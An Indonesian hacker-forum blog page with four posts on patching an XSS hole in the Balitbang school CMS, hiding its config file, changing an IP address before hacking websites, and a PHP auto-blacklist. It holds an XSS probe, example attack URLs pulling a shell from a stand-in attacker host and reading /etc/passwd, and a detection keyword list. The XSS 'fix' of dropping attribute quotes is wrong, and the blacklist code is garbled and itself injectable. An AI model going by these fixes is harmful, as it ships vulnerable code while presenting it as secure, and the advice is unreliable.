Saturday, October 6, 2012

Pacthing XSS_CMS Balitbang

Just to know.. Postingan saya ini mungkin sangat simple ,, Sebenernya ini udah dari dulu, waktu itu saya posting di Forum Sebelah, Yaudah tak share sini mungkin bermanfaat, dan mungkin ada yang pernah ngalamin nya..

Lagi ada Job bikin Site sekolah sama temen waktu minggu" kemarin... ane jadi bagian design sama fix" bug lah ( ga begitu bisa juga wkwkwk, yang bisa aja wkwkwk ) ,, ane coba pakek Balitbang CMS , nah waktu di scan sama acunetix ane nemu XSS , nah terus kaget tuh XSSnya beda, ga pernah nemu XSS kek gini ( kalo saya, maklum masih newbie ) ga tau kalo kalian dah pernah mungkin , saya cuman Share dikit buat ngatasinya. :D
Pesan dari saya jangan pernah remehin XSS ,, Sebelumnya ada yang tau XSS ? mungkin dah pada tau, kalo yang belum saya mo jelasin dikit ya biar kalo yg belum tau bisa paham apa itu XSS :D


XSS bisa juga dikenal dengan singkatan Cross Site Scripting yang memanfaatkan / memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client.
Dan XSS sangat Rawan dan di bedakan dengan beberapa Jenis yaitu :

- Dengan memanfaatkan GET Method
Serangan XSS dengan memanfaatkan fasilitas GET di protokol HTTP, merupakan metode yang paling sering dilakukan. CMIIW

- Dengan memanfaatkan POST Method
Metode ini memerlukan tingkatan keahlian lebih lanjut, karena variabel POST dikirimkan terpisah dari URL website target, karenanya penyerangan secara langsung menjadi tidak mungkin.

- Flash Attack
Dengan memanfaatkan active scripting pada aplikasi flash, XSS dapat disisipkan pada bagian signature dari aplikasi tertentu.


Nah Cuman Segitu aja Penjelasan nya, langsung cara Fixx nya :D
Fixnya menurut saya mudah kok,, :

1. Scan dulu Webnya, jika sudah akan terlihat error XSS seperti ini :
[Image: 1.png]

Terlihat di situ yg no.1 adalah error XSS lalu klik salah satu error itu , kemudian seperti no.2 launch the attack with http editor.

2. Jika sudah maka akan tampak tampilan Seperti ini :
[Image: 2.png]

Penjelasan: Kita akan buka terlebih dahulu file guru.php dimana terdapat error yg terlihat seperti di no.3 , dan kita akan melihat bagaimana sih error yg nampak,, ;)

3. Seperti gambar di atas, kita coba copy Link seperti no 2 ke browser, kita lihat apakah yg pesan yg muncul? . Bisa di liat Seperti ini yg muncul :
[Image: 3.png]

Nah Seperti itu Errornya.. kita lanjut ke permasalahan nya untuk memperbaiki itu.

4. Buka file guru.php / file yg ada bug seperti itu dan seperti di pic no 2. Jika sudah di buka kita search kata" yg mendekati error tersebut, lihat di pic no 2, kita gunakan Ctrl+F dan cari kata

5. Jika sudah ketemu, File tersebut sebenarnya seperti ini :


Dan jika di acunetix seperti ini :

nmouseover=prompt(990115) bad="" >

6. Cara perbaikinya, Hapus tanda kutip dua yg berada di value="'.$nama.'" , sehingga menjadi seperti value='.$nama.'

7. Save, kemudian buka di browser , dan lihat apa yang terjadi, Script tersebut tidak berjalan, dan hanya menghasilkan output text di search box. Terlihat Seperti ini :
[Image: 4.png]

8. Jadi mungkin itu hanya kesalahan dalam coding html / php ,, saya juga masih mencari apa sebenarnya kesalahan tersebut, dan mungkin jika ada yang tau, bisa di jelaskan :D
coz saya cuman share doank bug dan cara fixnya, Jika berguna Cendol , kalau tidak juga tidak apa-apa,, ngehahahahaha

Created By Syndrom2211 HN
READ MORE - Pacthing XSS_CMS Balitbang

Pencegahan Config Stealer_CMS Balitbang

Masih sama di balitbang ini..
Hallo mastah2 semuanya.. masih job yang minggu-minggu kemarin , saya masih ingin meningkatkan security ( walaupun hanya sekecil apapun , tapi sangat bermanfaat bila kita tambahkan ). Emang sih kata si abang CBF-dark-division meskipun website yg kita pertahankan dengan sekuat"nya dengan sekuritas yg tinggi kalau servernya jelek, yasudah kita tidak bisa berbuat apapun, kita juga harus bisa memilih server yg kira" bisa di percayalah :D . ok kali ini saya mo share bagaimana pencegahan ConfigStealer di balitbang,, Mungkin udah pada ada yang bisa dari mastah2 sekalian , tapi kali ini saya cuman hanya share saja.. kali aja ada yang membutuhkan :D .
Sebelumnya kalian tau apa itu ConfigStealer ???udah pada taulah pasti semuanya ngehahahaha Santet .

Kita ke pencegahan nya langsung aja lah:

1. Kita buka file koneksi.php yang letaknya berada di functions/koneksi.php.
2. Setelah di buka, kita buka scriptnya terserah mau di N++ atau notepad biasa ( menyarankan N++ biar nyaman editnya ).
3. Di situ terdapat script :
require('../lib/config.php');

yang di atas fungsinya untuk memanggil file confignya, nah disini kita akan rubah require('../lib/config.php'); dengan require('../syndrom/configuration.php');
Disitu saya membuat folder bernama syndrom dan berisi file configuration.php ,, darimana file configuartion.php nya?? kita Copas / copy File yang ada di lib/config.php semua file tentunya,, dan pastekan di folder syndrom yang sudah saya buat.

4. Pindah ke folder lib/config.php , kemudian anda rubah $dbhost, $dbuser, $dbpasswd, $dbname sesuka hati anda, yang penting bisa mengecoh sang hacker. Bisa di lihat Seperti ini yang saya gunakan :
 $dbhost = "localhost";
$dbuser = "asal_wae";
$dbpasswd = "asal_wae";
$dbname = "aya_weh_hayang_apal_wae";


5. Buka site anda di url dan lihat apa yang terjadi, Jika anda mendapatkan error seperti in

[Image: 111.png]

Maka kita akan buka file fungsi_kalender.php yang berada di folder functions/fungsi_kalender.php .

6. Jika sudah di buka Filenya, kita Lihat seperti gambar di atas, error terdapat pada baris 101, coba kita lihat ada apakah disana. Terlihat seperti ini di baris 101 :
/*ÊÓËÃѺàª×èÍÁµè͡Ѻ°Ò¹¢éÍÁÙÅ*/
mysql_connect($hostLH,$userLH,$passLH) or die("Connection Fail ".mysql_error());
mysql_select_db($dbLH)or die("¢Íâ·É¤èеԴµèÍTable äÁèä´é¤èÐ");



Ternyata settingan konek SQL,. Mari kita scroll ke atas sedikit dan anda akan menemukan script di baris 26-31 yang isinya :
####### config DB #######
$hostLH = $host;
$userLH =$user;
$passLH =$pwd;
$dbLH = $db;
####### config #######


Wah ternyata 2 itu yang error, mari kita perbaiki.

7. Terlihat seperti file tidak menemukan settingan yang benar untuk mengkonekan ke SQLnya., Coba lihat ke step no.4, saya mencontohkan itu sebagai konek SQLnya.
Pada Baris antara 101, Asal Mula Sebelum di benarkan :
/*ÊÓËÃѺàª×èÍÁµè͡Ѻ°Ò¹¢éÍÁÙÅ*/
mysql_connect($hostLH,$userLH,$passLH) or die("Connection Fail ".mysql_error());
mysql_select_db($dbLH)or die("¢Íâ·É¤èеԴµèÍTable äÁèä´é¤èÐ");
/*ÊÓËÃѺàª×èÍÁµè͡Ѻ°Ò¹¢éÍÁÙÅ*/



Lalu $hostLH , $userLH , $passLH , $dbLH ganti menjadi :
/*ÊÓËÃѺàª×èÍÁµè͡Ѻ°Ò¹¢éÍÁÙÅ*/
mysql_connect($dbhost,$dbuser,$dbpasswd) or die("Connection Fail ".mysql_error());
mysql_select_db($dbname)or die("¢Íâ·É¤èеԴµèÍTable äÁèä´é¤èÐ");
/*ÊÓËÃѺàª×èÍÁµè͡Ѻ°Ò¹¢éÍÁÙÅ*/



Pada baris 26-31 , Asal Mula Sebelum di benarkan :
####### config DB #######
$hostLH = $host;
$userLH =$user;
$passLH =$pwd;
$dbLH = $db;
####### config #######



Lalu ganti semua script di atas, menjadi :
####### config DB #######
$dbhost = "localhost";
$dbuser = "root";
$dbpasswd = "";
$dbname = "webtemp";
####### config #######


Settingan di atas adalah koneksi SQL yang saya gunakan, itu di rubah tergantung apa nama semua settingan SQL anda.

8. Kemudian Save File tersebut, dan lihat apa yang terjadi, Ternyata kita berhasil memindahkan File config tersebut. CMIIW
Bila masih ada yang error , maklumlah masih newbie , cuman iseng tes" bugnya . ngehahahahha

Created By Syndrom2211 HN
READ MORE - Pencegahan Config Stealer_CMS Balitbang

Mengubah ip Anda Dalam Satu Menit

ok langsung aja ya teman teman Bingung
jadi bingung niBingung cekidotGanteng
1. Klik pada "Start" di pojok kiri bawah layar
2. Klik pada "Run"
3. Ketik "command" dan tekan ok

Anda sekarang harus pada layar MSDOS prompt.

4. Ketik "ipconfig / release" hanya seperti itu, dan tekan "enter"
5. Ketik "exit" dan meninggalkan prompt
6. Klik kanan pada "Network Places" atau "My Network Places" di desktop Anda.
7. Klik pada "properti"

Anda sekarang harus pada layar dengan sesuatu yang berjudul "Local Area Connection", atau sesuatu yang dekat untuk itu, dan, jika Anda memiliki jaringan hooked up, semua jaringan Anda yang lain.

8. Klik kanan pada "Local Area Connection" dan klik "properties"
9. Double-klik pada "Internet Protocol (TCP / IP)" dari daftar di bawah tab "General"
10. Klik pada "Gunakan alamat IP berikut" di bawah tab "General"
11. Buat alamat IP (Tidak peduli apa itu. Saya cukup ketik 1 dan 2 sampai i mengisi daerah atas).
12. Tekan "Tab" dan secara otomatis harus mengisi bagian "Subnet Mask" dengan nomor standar.
13. Tekan "Ok" tombol di sini
14. Tekan "Ok" tombol lagi

Anda sekarang harus kembali ke "Local Area Connection" screen.

15. Klik kanan kembali pada "Local Area Connection" dan pergi ke properti lagi.
16. Kembali ke "TCP / IP" Pengaturan
17. Kali ini, pilih "Mendapatkan alamat IP secara otomatis"
tongue.gif 18. Tekan "Ok"
19. Tekan "Ok" lagi
20. Anda sekarang memiliki alamat IP yang baru

Dengan sedikit latihan, Anda dapat dengan mudah mendapatkan proses ini turun sampai 15 detik.

P.S:
Ini hanya perubahan alamat IP dinamis Anda, bukan ISP / IP address. Jika anda berencana pada hacking website dengan trik ini sangat berhati-hati, karena jika mereka mencoba sedikit, mereka bisa melacak kembali


Created By RED-Code HN
READ MORE - Mengubah ip Anda Dalam Satu Menit

Mengamankan Web Dengan Auto Blacklist

Untuk mempersingkat waktu dan dari pada banyak bacot sesuai judul diatas kali ini saya akan menjelaskan tehnik mengamankan web menggunakan Auto Blacklist,, dimana,, apabila ada attacker yang mau nyoba-nyoba dengan web kita menggunakan tehnik SQL Injection maupun LFI/RFI maka web akan secara otomatis memasukan IPnya ke daftar blacklist dan secara otomatis mengalihkan attacker ke halaman yang sudah kita tentukan sebelumnya,, heheheheheheee,, Kira-kira begitu,, BonyokBonyok

Ok,, langsung ke topik,,

Pertama buatlah sebuah tabel pada database kamu, contoh tabel blacklist

CREATE TABLE `blacklist` (
`
ip_attackervarchar(50NOT NULL


Sekarang kita akan membuat sebuah file yang akan mendeteksi gerak-gerik sang attacker tersebut, dan apabila terdeteksi melakukan sesuatu hal yang dianggap melakukan Pengijeksiaan maka akan otomatis menyalin IP attacker tersebut

file "blacklist.php


//Deteksi user yang memasukan sebuah perintah penginjesian terhadap web kitaif(strpos($_SERVER['REQUEST_URI'], "%27") || strpos($_SERVER['REQUEST_URI'], "union") || strpos($_SERVER['REQUEST_URI'], "http://") || strpos($_SERVER['REQUEST_URI'], "www.") || strpos($_SERVER['REQUEST_URI'], "../") || strpos($_SERVER['REQUEST_URI'], "etc/passwd")) {
//Apabila terdeteksi melakukan penginjeksian, ambil IP mereka$ip $_SERVER['REMOTE_ADDR'];
//Kirim IP ke database kita$kirim_ip mysql_query("INSERT INTO blacklist VALUE ('$ip')");
}
?>



Setelah itu masuk ke file yang kamu rasa dapat di injeksi, saya contohkan file index.php

Contoh Penginjeksian oleh attacker

http://www.web.kamu/index.php?id=1' (SQL Injection)
http://www.web.kamu/index.php?page=http://www.root.attacker/shell.txt (RFI/LFI)
http://www.web.kamu/index.php?page=../../etc/passwd (RFI/LFI)

Untuk penjelasan tehnik diatas mungkin bisa di googling sendiri atau mungkin sudah banyak yang tahu,, karena disini kita akan membahas mengenai Auto Blacklist maka saya juga tidak akan memfokuskan dalam penjelasan tekhnik diatas,, CheerCheer

Oke Next..

Setelah masuk ke file index.php lakukan pengonekan pada file blacklist.php, gunakan fungsi include()


 include "blacklist.php"



Terus jangan lupa lakukan penganalisian IP, untuk mengalihkan attacker ke tempat lain apabila attacker mengakses web kita lagi
 
 
 


//Periksa IP attacker tersebut apa pernah masuk ke database kita$ipattacker mysql_query("SELECT * FROM blacklist where ip_attacker = '".$_SERVER['REMOTE_ADDR']."'");$konfirmasi_attacker mysql_num_rows($ipattacker);
//Apabila IP telah terdeteksi pernah masuk ke database maka alihkan attacker ke halaman lain, contoh :google.comif ($konfirmasi_attacker !== 0) {header('Location:http://google.com');
}
?>
 
 
Mungkin hanya itu dulu dari saya,, semoga sedikit membantu dalam pengamanan web kita dari tangan-tangan jahil,,
 
Created By tolonggalo HN 



READ MORE - Mengamankan Web Dengan Auto Blacklist
Template by : mhiman@ hacker-newbie.org